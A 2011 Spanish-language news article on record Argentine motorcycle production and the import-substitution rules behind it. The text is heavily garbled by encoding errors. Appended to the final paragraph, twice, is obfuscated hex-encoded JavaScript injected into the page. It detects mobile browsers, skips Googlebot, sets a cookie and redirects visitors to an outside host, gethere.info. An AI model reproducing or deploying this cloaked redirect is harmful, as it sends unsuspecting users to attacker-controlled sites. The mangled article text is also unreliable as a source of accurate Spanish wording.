RAi??cord histA?rico: producirA?n 450.000 motos argentinas

| 2 octubre, 2011 | 0 Comentarios

La ministra Giorgi asegurA? que en 2011 el 66% de las unidades que se vendan en el paAi??s serA?n de fabricaciA?n nacional, con patentamiento rAi??cord de 700.000 motos.

La ministra de Industria, DAi??bora Giorgi, resaltA? el crecimiento de la producciA?n nacional de motocicletas que en este 2011 ai??i?? por segundo aAi??o consecutivo ai??i?? marcarA? un rAi??cord histA?rico de 450.000 unidades. Giorgi destacA? ademA?s que, entre 2003 y 2010, el empleo del sector crece anualmente a un promedio mayor al de la industria automotriz y al de la industria en general.
Desde el Ministero de Industria, DAi??bora Giorgi expresA?: ai???Recuperamos este sector que en 2011 va a llegar a la marca histA?rica de 450.000 motos de producciA?n nacional (70.000 mA?s que el rAi??cord anterior de 2010), mientras que en 2002 se produjeron apenas poco mA?s de 7.000 unidadesai???, asegurA? Giorgi y destacA? que ai???el mercado de motos estA? en expansiA?n, con un consumo que crece a un 47% anual y el empleo creciA? a un promedio de 12% anual, por encima de la industria automotriz (9%) y de la industria en general (5%)ai???.
La ministra seAi??alA? que este aAi??o habrA? una participaciA?n de las unidades de fabricaciA?n nacional rAi??cord del 66% – superando el 45% del 2010 – con mayor integraciA?n de motopartes argentinas. AdemA?s, Giorgi destacA? que en 2010 se importaron casi 200.000 motos menos que en 2008.

La polAi??tica de sustituciA?n de importaciones junto a la aplicaciA?n de licencias no automA?ticas y las exigencias del Gobierno Nacional de equilibrio de la balanza comercial sectorial impulsaron que empresas lAi??deres en el mundo como Honda, Yamaha y Suzuki realizaran inversiones para aumentar su producciA?n local.
El Ministerio de Industria dispuso que por cada motocicleta importada se deben ensamblar dos en el paAi??s (se proyecta que sean 4 en 2012) o producir una unidad con al menos la mitad de los componentes fabricados en Argentina.

Los importadores que no poseen plantas de ensamblado en el paAi??s o que no tengan proyectos productivos deberA?n importar este aAi??o un 40% menos que el aAi??o pasado, y para los importadores de motopartes, la exigencia es disminuir un 20% este aAi??o sus compras en el exterior y proponer una estrategia de sustituciA?n por partes nacionales.
Para regular el funcionamiento de estas medidas se formA? una mesa de integraciA?n de autopartes nacionales integrada por el sector privado y la SecretarAi??a de Industria de la NaciA?n, a cargo de Eduardo Bianchi.
Asimismo, se realizan auditorAi??as en todas las plantas de ensamblado del paAi??s, a fin de comprobar si la capacidad de la planta es compatible con la importaciA?n de motos en formato CKD (tAi??rmino que define a una unidad completamente desarmada, sin que le falte ninguna pieza componente, para ser ensamblada en las terminales). AsAi??, se busca evitar que ingresen motos terminadas pero declaradas como CKD.
La ministra, junto al secretario de Industria, Eduardo Bianchi, y el intendente de San MartAi??n, Ricardo Ivoskus, participA? de la inauguraciA?n de la tercera ediciA?n de Expomotoshow, que se desarrollarA? hasta el 25 de setiembre en el Centro de Exposiciones Miguelete. AllAi??, la ministra explicA? que tambiAi??n se espera un rAi??cord de patentamientos para este aAi??o, que superarAi??a las 700.000 unidades, luego de que el aAi??o pasado cerrara con el rAi??cord histA?rico de 559.816 motos patentadas.

El Sector

El sector de motocicletas existe en nuestro paAi??s desde 1950. Actualmente casi 30 firmas producen en Argentina, principalmente en Buenos Aires, Santa Fe y CA?rdoba. El sector emplea a 20.000 personas (16.000 son empleos directos) a los que se suman otros 2.500 empleados de concesionarios, negocios de repuestos y talleres.
A partir de los aAi??os ai??i??90 la producciA?n se redujo sistemA?ticamente, pasando de 100.000 unidades en 1993 a 26.000 en 2001, y muchas empresas y puestos de trabajo se perdieron.

Inversiones

El creciente mercado interno, a partir de la mayor demanda, hizo que marcas lAi??deres mundiales en fabricaciA?n de motos, como Honda, Yamaha y Suzuki inviertan para aumentar su producciA?n en el paAi??s. Yamaha Motors Argentina producirA? este aAi??o 50.000 motos en el paAi??s, la misma cantidad que la suma de los tres aAi??os anteriores. AdelantA? ademA?s que estA? evaluando nuevas inversiones para aumentar su producciA?n y el nivel de integraciA?n local. La divisiA?n Motos de Honda, en tanto, anunciA? una inversiA?n de 3 millones de dA?lares para comenzar a producir motos en la planta que la firma tiene en Campana, lo que le permitirA? incrementar en 28.000 unidades mA?s la producciA?n prevista para 2012 ai??i??adicionales a las que se produzcan en la planta de Florencio Varela-, e incorporar dos nuevos modelos de fabricaciA?n nacional este aAi??o y otros 3 el aAi??o que viene. AsAi?? la empresa comenzarA? a producir modelos que antes fabricaba en Brasil, incrementarA? la exportaciA?n de repuestos y motopiezas a toda AmAi??rica Latina y prevAi?? que las motos para el mercado nacional tengan un 75% de producciA?n nacional. Finalmente, Suzuki instalarA? en el paAi??s de una planta de ensamblado de motos, con una inversiA?n de 1,7 millA?n de pesos. La empresa japonesa se habAi??a ido del paAi??s en 2002, tras la crisis econA?mica, retomA? su vAi??nculo en 2006 y ahora da un paso mA?s en su apuesta a la Argentina con la construcciA?n de esta planta en la localidad bonaerense de Boulogne. AllAi?? ensamblarA? el popular modelo de moto AX 100 y tambiAi??n armarA? otros modelos de la marca.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Tags: , , , ,

Categoría: Fabricación de motos

Deja un comentario


Logo FinancialRed
Logo FinancialRed